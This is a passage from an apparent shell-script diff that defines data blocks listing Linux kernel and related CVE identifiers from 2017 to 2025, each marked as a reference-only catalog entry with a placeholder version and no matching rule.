CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-2636 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-5123 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-5618 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-5899 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-7184 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-7616 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2018-1000001 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +EOF_DATA_10 +)" +KERNEL_CVE_DATA_11="$(cat <<'EOF_DATA_11' +CVE-2018-10900 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2018-14665 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2018-17182 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2018-18281 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2018-3639 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2018-6554 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2018-6555 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2018-8781 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2018-9568 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-10149 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-10567 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-11190 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-12181 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-14040 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-14041 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-16508 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-18634 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-18675 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-18683 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-18862 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-19377 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-2000 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-2025 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-2181 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-2214 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +EOF_DATA_11 +)" +KERNEL_CVE_DATA_12="$(cat <<'EOF_DATA_12' +CVE-2019-2215 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-7304 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-7308 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-9213 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-9500 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2019-9503 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-0041 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-0423 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-11179 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-12351 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-12352 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-14356 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-14381 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-14386 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-16119 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-24490 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-25220 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-27194 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-27786 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-28343 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-28588 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-3680 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-8835 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2020-9470 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-0399 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +EOF_DATA_12 +)" +KERNEL_CVE_DATA_13="$(cat <<'EOF_DATA_13' +CVE-2021-0920 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-1048 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-1905 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-1940 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-1961 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-1968 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-1969 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-20226 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-23134 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-25369 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-25370 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-26341 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-26708 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-27363 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-27364 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-28663 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-28664 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-29657 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-3156 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-32606 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-33909 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-34866 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-3492 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-3573 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-3609 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +EOF_DATA_13 +)" +KERNEL_CVE_DATA_14="$(cat <<'EOF_DATA_14' +CVE-2021-3715 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-39793 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-39815 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-4034 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-41073 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-42008 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-4204 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-42327 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-43267 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-4440 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-44733 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2021-45608 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-0185 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-0435 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-1015 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-1016 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-1786 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-1972 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-20122 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-20186 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-20409 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-20421 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-2078 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-22057 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-22071 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +EOF_DATA_14 +)" +KERNEL_CVE_DATA_15="$(cat <<'EOF_DATA_15' +CVE-2022-22265 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-22706 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-23222 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-24354 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-25636 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-25664 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-2590 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-2602 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-27666 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-29582 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-34918 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-38181 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-3910 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-41218 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-42703 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-42895 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-42896 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-4543 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-46395 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-47943 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2022-49080 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-0179 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-0266 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-0461 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-0590 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +EOF_DATA_15 +)" +KERNEL_CVE_DATA_16="$(cat <<'EOF_DATA_16' +CVE-2023-1206 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-1829 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-2008 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-20938 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-21400 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-2156 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-2163 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-23586 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-2593 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-2598 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-26083 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-2612 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-2640 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-31248 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-32233 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-32629 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-3269 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-32832 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-32837 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-32878 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-32882 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-33063 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-33106 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-33107 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-3338 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +EOF_DATA_16 +)" +KERNEL_CVE_DATA_17="$(cat <<'EOF_DATA_17' +CVE-2023-3389 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-3390 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-35001 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-3865 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-3866 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-4130 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-4211 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-42483 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-4273 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-45864 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-4611 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-48409 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-50809 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-5178 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-52440 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-52447 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-52922 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-52926 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-5717 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-6200 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-6241 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-6546 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-6931 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2023-6932 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-0582 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +EOF_DATA_17 +)" +KERNEL_CVE_DATA_18="$(cat <<'EOF_DATA_18' +CVE-2024-20018 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-21455 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-23372 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-23373 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-23380 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-26809 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-26921 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-26925 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-26926 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-31333 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-33060 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-35880 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-36016 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-36886 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-36904 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-36974 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-36978 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-38399 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-38402 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-41003 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-41009 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-41010 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-43047 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-43882 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-44068 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +EOF_DATA_18 +)" +KERNEL_CVE_DATA_19="$(cat <<'EOF_DATA_19' +CVE-2024-46713 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-46740 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-49739 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-49848 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-49882 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-50066 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-50264 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-50302 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-53104 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-53141 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-53197 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-56614 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-56615 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-56626 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-56627 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2024-56770 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-0072 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-0927 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-21479 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-21666 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-21669 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-21670 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-21692 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-21700 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-21703 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +EOF_DATA_19 +)" +KERNEL_CVE_DATA_20="$(cat <<'EOF_DATA_20' +CVE-2025-21756 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-21836 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-22056 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-23280 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-23330 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-32463 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-37752 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-37756 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-37899 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-37947 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-38001 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-38003 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-38004 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-38617 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-39946 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-39965 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-40040 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-6349 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source 